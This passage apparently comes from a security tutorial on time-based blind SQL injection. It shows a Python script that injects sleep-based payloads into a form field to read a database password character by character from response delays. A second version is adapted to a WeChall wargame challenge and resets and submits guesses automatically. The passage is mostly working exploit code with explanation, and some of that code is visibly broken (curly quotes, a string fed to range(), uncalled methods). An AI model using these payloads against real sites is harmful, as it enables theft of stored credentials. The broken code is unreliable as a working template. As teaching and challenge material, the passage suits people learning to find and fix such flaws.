Sometimes, life hands you lemons; blind SQL Injection points are some of those lemons. When you're reasonably sure you've found an SQL Injection vulnerability but there are no errors and you can't get it to return your data, in these situations you can use timing commands within SQL to cause the page to pause in returning a response and then use that timing to make judgments about the database and its data.
We will create a script that makes requests to the server and returns differently timed responses, depending on the characters it's requesting. It will then read those times and reassemble strings.
The script is as follows:
import requests
times = []
print “Kicking off the attempt”
cookies = {'cookie name': 'Cookie value'}
payload = {'injection': ''or sleep char_length(password);#', 'Submit': 'submit'}
req = requests.post('<target url>' data=payload, cookies=cookies)
firstresponsetime = str(req.elapsed.total_seconds)
for x in range(1, firstresponsetime):
payload = {'injection': ''or sleep(ord(substr(password, '+str(x)+', 1)));#', 'Submit': 'submit'}
req = requests.post('<target url>', data=payload, cookies=cookies)
responsetime = req.elapsed.total_seconds
a = chr(responsetime)
times.append(a)
answer = ''.join(times)
print “Recovered String: “+ answerAs ever, we import the required libraries and declare the lists that we need to fill later on. We also have a function here that states that the script has indeed started. With some time-based functions, the user can be left waiting a while. In this script, I have also included cookies using the request library. For this sort of attack, it is likely that authentication is required:
times = []
print “Kicking off the attempt”
cookies = {'cookie name': 'Cookie value'}We set our payload up in a dictionary along with a submit button. The attack string is simple enough to understand with some explanation. The initial tick has to be escaped to be treated as text within the dictionary. That tick breaks the SQL command initially and allows us to input our own SQL commands. Next, we say that in the event of the first command failing, perform the following command with OR. We then tell the server to sleep for one second for every character in the first row in the password column. Finally, we close the statement with a semicolon and comment out any trailing characters with a hash (or pound if you're American and/or wrong):
payload = {'injection': ''or sleep char_length(password);#', 'Submit': 'submit'}We then set length of time the server took to respond as the firstreponsetime parameter. We will use this to understand how many characters we need to brute-force through this method in the following chain:
firstresponsetime = str(req.elapsed).total_seconds
We create a loop that will set x to be all numbers from 1 to the length of the string identified and perform an action for each one. We start from 1 here because MySQL starts counting from 1 rather than zero, like Python:
for x in range(1, firstresponsetime):
We make a similar payload as before, but this time we are saying sleep for the ascii value of X character of the password in the password column, row one. So, if the first character was a lower case a, then the corresponding ascii value is 97, and therefore the system would sleep for 97 seconds. If it was a lower case b, it would sleep for 98 seconds, and so on:
payload = {'injection': ''or sleep(ord(substr(password, '+str(x)+', 1)));#', 'Submit': 'submit'}We submit our data each time for each character place in the string:
req = requests.post('<target url>', data=payload, cookies=cookies)We take the response time from each request to record how long the server sleeps and then convert that time back from an ascii value into a letter:
responsetime = req.elapsed.total_seconds a = chr(responsetime)
For each iteration, we print out the password as it is currently known and then eventually print out the full password:
answer = ''.join(times) print “Recovered String: “+ answer
This script provides a framework that can be adapted to many different scenarios. Wechall, the web app challenge website, sets a time-limited, Blind SQLi challenge that has to be completed in a very short time period. The following is our original script, which has been adapted to this environment. As you can see, I've had to account for smaller time differences in differing values and server lag, and also incorporated a checking method to reset the testing value each time and submit it automatically:
import subprocess
import requests
def round_down(num, divisor):
return num - (num%divisor)
subprocess.Popen([“modprobe pcspkr”], shell=True)
subprocess.Popen([“beep”], shell=True)
values = {'0': '0', '25': '1', '50': '2', '75': '3', '100': '4', '125': '5', '150': '6', '175': '7', '200': '8', '225': '9', '250': 'A', '275': 'B', '300': 'C', '325': 'D', '350': 'E', '375': 'F'}
times = []
answer = “This is the first time”
cookies = {'wc': 'cookie'}
setup = requests.get ('http://www.wechall.net/challenge/blind_lighter/index .php?mo=WeChall&me=Sidebar2&rightpanel=0', cookies=cookies)
y=0
accum=0
while 1:
reset = requests.get('http://www.wechall.net/challenge/blind_lighter/ index.php?reset=me', cookies=cookies)
for line in reset.text.splitlines():
if “last hash” in line:
print “the old hash was:”+line.split(“ “)[20].strip(“.</li>”)
print “the guessed hash:”+answer
print “Attempts reset
”
for x in range(1, 33):
payload = {'injection': ''or IF (ord(substr(password, '+str(x)+', 1)) BETWEEN 48 AND 57,sleep((ord(substr(password, '+str(x)+', 1))- 48)/4),sleep((ord(substr(password, '+str(x)+', 1))- 55)/4));#', 'inject': 'Inject'}
req = requests.post ('http://www.wechall.net/challenge/blind_lighter/ index.php?ajax=1', data=payload, cookies=cookies)
responsetime = str(req.elapsed)[5]+str(req.elapsed)[6]+str(req.elapsed)[8]+ str(req.elapsed)[9]
accum = accum + int(responsetime)
benchmark = int(15)
benchmarked = int(responsetime) - benchmark
rounded = str(round_down(benchmarked, 25))
if rounded in values:
a = str(values[rounded])
times.append(a)
answer = ''.join(times)
else:
print rounded
rounded = str(“375”)
a = str(values[rounded])
times.append(a)
answer = ''.join(times)
submission = {'thehash': str(answer), 'mybutton': 'Enter'}
submit = requests.post('http://www.wechall.net/challenge/blind_lighter/ index.php', data=submission, cookies=cookies)
print “Attempt: “+str(y)
print “Time taken: “+str(accum)
y += 1
for line in submit.text.splitlines():
if “slow” in line:
print line.strip(“<li>”)
elif “wrong” in line:
print line.strip(“<li>”)
if “wrong” not in submit.text:
print “possible success!”
#subprocess.Popen([“beep”], shell=True)